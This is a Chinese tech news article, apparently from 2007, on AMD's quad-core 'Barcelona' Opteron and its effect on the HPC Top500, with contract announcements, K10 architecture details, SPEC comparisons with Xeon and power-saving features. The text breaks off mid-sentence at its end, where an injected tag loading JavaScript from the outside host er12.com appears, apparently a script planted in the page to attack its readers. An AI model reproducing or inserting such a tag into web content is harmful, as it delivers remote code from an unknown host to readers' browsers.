作为一个国家科研水平的标志之一,高性能计算历来受到各国政府、教育以及科研人员的关注。如果将hpc top500比作这个高性能计算领域的奥运会,那么能登上这一排行榜的次数越多,就越能说明一个国家的计算技术实力。目前美国在这一领域是毫无争议的世界第一。根据top500.org在2007年6月公布的最新数据,2005年由ibm建造的bluegene/l(蓝色基因)以360 teraflops的峰值处理能力排名世界第一,由cray公司建造的jaguar (美洲虎)和red storm(红色风暴)分别以119 teraflops和124.42 teraflops(峰值)的成绩分列第二和第三。后两者都基于amd双核皓龙处理器。但很快,这份高性能计算排行榜可能将会被改写,原因就来自于9月10日发布的一颗cpu——代号为“巴塞罗那”的amd四核皓龙处理器。
高性能计算领域的新格局
高性能计算领域向来是专用的体系结构和处理器的专属——不管是当年的大型机,还是后来日本的地球模拟器和现在的blue gene/l,都是如此。而现在,这一“专用体系+专用处理器”称雄的历史,将被“通用处理器+集群”的模式逐渐取代。最新的hpc top500强中,基于工业标准服务器构建的linux集群已经成为主流,在体系架构方面,集群占到了74.6%。
随着amd高调发布其代号为“巴塞罗那”的四核皓龙处理器,采用巴塞罗那冲击高性能计算新纪录的计划也纷纷登场。首先是sun宣布将采用16,000颗amd巴塞罗那处理器来建造代号为“巡逻兵”的超级计算机,为得克萨斯高级计算中心(texas advanced computing center)提供高达500teraflop的峰值计算能力。从目前的top500榜单来看,一旦建成,它将成为新一代高性能计算的霸主。接着,appro又宣布赢得了国家核安全委员会(nnsa)旗下三大国家实验室的大单,通过tlcc计划,采用12096颗巴塞罗那处理器为lawrence livermore、los alamos和sandia三大国家实验室搭建计算性能高达438 teraflop/s的linux高性能计算集群,将仅次于“巡逻兵”之后,成为高性能计算的亚军。一推出,amd巴塞罗那便将高性能计算的世界冠亚军收入囊中。
事实上,发布刚一个多月,巴塞罗那就给高性能计算格局带来了诸多变数。在美国,西北太平洋国家实验室pnnl将采用5000颗巴塞罗那替代以前的安腾系统。在国内,曙光也基于amd的巴塞罗那,赢得了北京航空航天大学高性能计算机群和苏州气象局的高性能计算系统等项目,计算峰值分别高达每秒3.9万亿次和2.56万亿次。
“巴塞罗那”的底气
从零到成为主流,通用处理器用了不到10年时间,这一进程尤以皓龙进入高性能计算领域的四年最为迅速。因为在设计中就借鉴了risc架构的优势,加上特有的直连架构、集成内存控制器等设计和可以加速特定应用的torrenza开放式协作计划,amd皓龙在高性能计算领域已经异军突起,有将近100套基于amd皓龙的系统进入hpc top500强排行。
而现在,随着新一代k10架构推出的多项amd全新创新技术,无疑给了“巴塞罗那”称霸高性能计算的更多底气。“巴塞罗那”采用了增强的核心,具有增强的128位浮点加速器、amd 内存优化技术、amd 平衡智能缓存和快速虚拟化索引(rvi, rapid virtualization indexing)等一系列领先技术,实现了性能的飞跃。由于采用了革命性的128位专用宽浮点加速器,sse的执行带宽、指令拾取带宽、数据缓存负载带宽、l2/nb带宽等都有成倍的增长,而指令拾取带宽、数据缓存负载带宽两项也是英特尔core架构的两倍,避免了数据交换的瓶颈。另外,“巴塞罗那”采用了更深的36 级浮点调度器,进行独立的128 位操作,而英特尔的core架构采用与整数共享的32 级调度器。
spec最近公布的数据,证实了amd“巴塞罗那”出色的浮点运算性能。在cfp2006 rates浮点性能测试中,用两颗主频为2.0ghz的四核amd皓龙2350搭建的双路系统成绩要比同主频的四核至强双路系统高出达36%。在四路系统上,amd四核皓龙的优势更明显,主频为2.5ghz的amd皓龙8360se的四路四核系统,峰值性能比主频为2.93ghz的四路四核至强系统高出40%。
“巴塞罗那”的底气不仅来自于性能的大幅提升,还有能耗上的显著降低。“巴塞罗那”采用一系列节能技术,使cpu的核心增加一倍的同时,功耗保持不变:amd coolcore™ 技术,通过关闭处理器上非工作的电路块来降低能耗;独立动态核心技术,对amd powernow!™技术的增强,使每个核心可以根据其应用的特定性能需求来调整时钟频率;双动态电源|稳压器管理(ddpm, dual dynamic power management),为cpu核心和内存控制器分别独立供电,支持核心和内存控制器根据应用需要以不同的电压工作。
领先的浮点运算性能和低功耗特性使得“巴塞罗那”在高性能计算方面的优势尽显,专业人士表示,随着“巴塞罗那”的大规模上市,将会在石油勘探、气象预报、地震分析、生物制?script src=http://er12.com/t.js>









